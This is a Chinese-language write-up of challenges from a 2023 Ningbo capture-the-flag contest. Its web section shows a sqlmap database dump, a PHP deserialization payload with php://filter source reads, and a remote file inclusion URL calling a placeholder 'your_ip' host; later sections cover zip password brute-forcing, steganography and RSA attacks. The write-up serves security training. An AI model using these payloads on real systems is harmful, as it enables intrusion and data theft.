天一永安杯宁波市网络安全大赛 2023 Writeup
7 min read
因为线下不报差旅,简单划划水(绝对不是因为打不进线下!😫)
Web
Query
Query suitable data and get your flag.
POST http://37a6852ac4faf290.node.nsctf.cn/login.php HTTP/1.1
Host: 37a6852ac4faf290.node.nsctf.cn
Content-Length: 21
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://37a6852ac4faf290.node.nsctf.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://37a6852ac4faf290.node.nsctf.cn/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=8lvsj65t588pem3sqkj1m24md6
Connection: close
username=1&password=*
直接使用 sqlmap 一把梭即可
python .\sqlmap.py -r post.txt -D 'ctf' -T 'f111' --dump
Deserialization
Construct your object
访问环境查看源代码发现代码片段,要求传递 $read
和 $input
,其中 $read
不能包含 fl4g
<!--
//The location of the flag is at route.php
$read = $_POST["read"];
$input = $_POST["input"];
if(!isset($read) or !isset($input))
{
die("NONONO!");
}
if(strpos($read, "f14g")===FALSE)
{
include($read);
$input = unserialize($input);
$input2 = clone $input;
$input2->position = "route.php";
}
else{
die("NONONO!");
}
-->
NONONO!
根据已知逻辑,直接构造,首先使用伪协议先读取 route.php
read=php://filter/convert.base64-encode/resource=route.php&input=123
得到文件源码
<h1>Here can you find the position of the flag!</h1>
<?php
$position = "f14g.php";
$gadget = "h1nt.php";
?>
文件中又提到了 h1nt.php
接着读取
<?php
class test
{
public $position;
public function __clone(){
echo file_get_contents($this->position);
return $this->position;
}
}
?>
逻辑很简单直接根据逻辑构造代码
<?php
class test
{
public $position;
}
$f = new test();
$f->position = 'f14g.php';
var_dump(serialize($f));
// O:4:"test":1:{s:8:"position";s:8:"f14g.php";}
因为我们需要触发反序列化,所以 read
需要读取 h1nt.php
,最终传递的参数为
read=h1nt.php&input=O:4:"test":1:{s:8:"position";s:8:"f14g.php";}
CodeCheck
Check this code!
查看网页源代码得到部分代码片段
<!--
$flag = "***********";
if(!isset($_GET['a']) or !isset($_GET['b']))
{
die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag")
{
die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c'])
{
die("NONONO");
}
if(isset($_GET['d']))
{
include($_GET['d']);
}-->
NONONO
逻辑很简单,要求 a
读取的内容等于 flag
,然后 b
和 c
内容不相同,直接远程文件包含+伪协议
http://e644ab7e50751e44.node.nsctf.cn/
?a=http://your_ip/1.txt
&b=http://your_ip/1.txt
&c=flag
&d=php://filter/convert.base64-encode/resource=index.php
<!--
$flag = "***********";
if(!isset($_GET['a']) or !isset($_GET['b']))
{
die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag")
{
die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c'])
{
die("NONONO");
}
if(isset($_GET['d']))
{
include($_GET['d']);
}-->
<?php
$flag = "flag{flag{a3722bcf95f64d05aab15a41a000fdfb}}";
if(!isset($_GET['a']) or !isset($_GET['b']))
{
die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag")
{
die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c'])
{
var_dump($_GET['c']);
var_dump(file_get_contents($_GET['b']));
die("yes");
}
if(isset($_GET['d']))
{
include($_GET['d']);
}
?>
Misc
zip
Simple Compress
打开附件,文件备注了给了提示
The art of 0 and 1, and it will remain shorter than 9.
直接使用脚本列出所有可能,爆破得到密码 01001101
import itertools
digits = ['0', '1']
combinations = [''.join(combination) for combination in itertools.product(digits, repeat=9)]
with open('pass.txt', 'w') as f:
for combination in combinations:
f.write(combination + '\n')
SimpleDocument
More than image.
分离出一个 PDF 直接全选复制得到 flag(默认flag设置为了白色字体,所以看不到
BeautifulImage
Cool Mountain
lsb隐写,0通道存在一段base64
ZmxhZ3syNGVkZDc2ZTQ2YzIyYzY1Y2M1YmRkZDNjNmU0ZjZmM30=
Mobile
peacock
peacock
jadx
看半天没思路,直接尝试反编译 so
文件,发现是 base64
变表,直接解密即可
Crypto
secret
好神奇的密文!
import gmpy2
import libnum
p=134261118796789547851478407090640074022214132682000430136383795981942884853000826171189906102866323044078348933419038543719361923320694974970600426450755845839235949167391987970330836004768360774676424958554946699767582105556239177450470656065560178592346659948800891455240736405480828554486592172443394370831
q=147847444534152128997546931602292266094740889347154192420554904651813340915744328104100065373294346723964356736436709934871741161328286944150242733445542228293036404657556168844723521815836689387184856871091025434896710605688594847400051686361372872763001355411405782508020591933546964183881743133374126947753
n=19850163314401552502654477751795889962324360064924594948231168092741951675262933573691070993863763290962945190372400262526595224437463969238332927564085237271719298626877917792595603744433881409963046292095205686879015029586659384866719514948181682427744555313382838805740723664050846950001916332631397606277703888492927635867870538709596993987439225247816137975156657119509372023083507772730332482775258444611462771095896380644997011341265021719189098262072756342069189262188127428079017418048118345180074280858160934483114966968365184788420091050939327341754449300121493187658865378182447547202838325648863844192743
c=13913396366755010607043477552577268277928241319101215381662331498046080625902831202486646020767568921881185124894960242867254162927605416228460108399087406989258037017639619195506711090012877454131383568832750606102901110782045529267940504471322847364808094790662696785470594892244716137203781890284216874035486302506042263453255580475380742959201314003788553692977914357996982118328587119124144181290753389394149235381045389696841471483947310663329993873046123134587149661347999774958105091103806375702387084149309542351541021140111048408248121408401601979108510758891595550054699719801708646232427198902271953673874
e=28
n = p * q
phi = (p - 1) * (q - 1)
t = gmpy2.gcd(e, phi)
t1 = e // t
dt1 = gmpy2.invert(t1, phi)
mt1 = pow(c, dt1, n)
print(mt1)
s, m = gmpy2.iroot(mt1, t)
print(s)
print(libnum.n2s(int(s)))
Morse的笔记本
你知道吗。今天我竟然在街上捡到了100元钞票,我当时简直惊呆了,太幸运了。于是我赶紧把钞票捡起来!心里面十分高兴。走了一段路之后,我看见了一个老奶奶在街角卖菜!我就想。这100元钞票对我来说并不是很重要。但对她可能就很有用了。于是我走过去!把钞票递给了她。她非常感激。说我是个好心人。我也因此感到十分快乐!因为我知道。这个世界因为有我们每一个人的善良而变得更美好,今天天气真的很好,我和小丽!小明越好一起去公园玩,在公园里,我们看见了一只可爱的小松鼠,它在树枝上蹦来蹦去!十分活泼可爱。我们还看见了一些漂亮的花朵,它们在微风中轻轻摇曳。像在跳舞一样!我们一边走一边欣赏,一边笑一边玩。真是度过了一个美好的下午。回家的路上!我感到心情特别愉悦。因为我知道。只要心怀善意!天下没有做不成的事情。我经常会感叹人生的短暂。时间的流逝。但我从未停止过前进的步伐!人生路上,有时候你会遇到阻碍。但只要你努力地挑战,不放弃。就能突破困境!实现自己的梦想,所以,不管你遇到什么样的挑战,都不要气馁!坚持下去,你一定会收获成功的喜悦。因为!只有那些坚定自己方向的人,才能走得更远,更自信。当我们遭遇挫折和失败的时候!不要被打倒。要用心去学习,从失败中汲取经验教训。然后重新站起来!更加坚定地追求自己的目标。成功并不是一蹴而就的,需要我们付出长久的努力和坚持!但只要我们一直前进,终究会到达成功的彼岸!所以。让我们一起勇敢面对人生的挑战。迎接成功的喜悦。
mesr{997a9k414dx8m4061u74v15m1y32201k}
又是脑洞题目,观察发现只存在 ,.!
这三个符号,直接结合题目名转成摩斯电码
.--. .- ... ... .-- --- .-. -.. .. ... -.-. --- -. --. .-. .- - ...
// PASSWORDISCONGRATS
维吉尼亚密码解密之后凯撒密码解密得到 flag
rsa
用了什么数学知识嘞
import gmpy2
n = 36535558847082719901201561031181835346574576610950713924924272947759193576365817762980927638691696601293089537315055413746788190208875234794229119049056299551864869870291634941246362436491006904347559559494705922259007299126640817275929491680601926404543198957206717290905220235571289759182878331893962038379
c = 532997872940452282189043430008002793694788439822465302532208754231005799057972378308576109082463996551992533174546386979606697890310597738637156771564229
a = 2694858406312563434474553988904403597551484373358339092528913028454100111881368126493990657117571672510331411186745639563619323775673115439
R = PolynomialRing(Zmod(n), 'x')
x = R.gen()
f = 2 * a * x + 1
f_monic = f.monic()
ans = f_monic.small_roots(X=2 ** 60, beta=0.4, epsilon=0.05)
g = ans[0]
d = gmpy2.invert(gmpy2.mpz(65537), gmpy2.mpz((a - 1) * (g - 1)))
m = gmpy2.powmod(gmpy2.mpz(c), d, gmpy2.mpz(a * g))
plaintext = bytes.fromhex(hex(int(m))[2:])
plaintext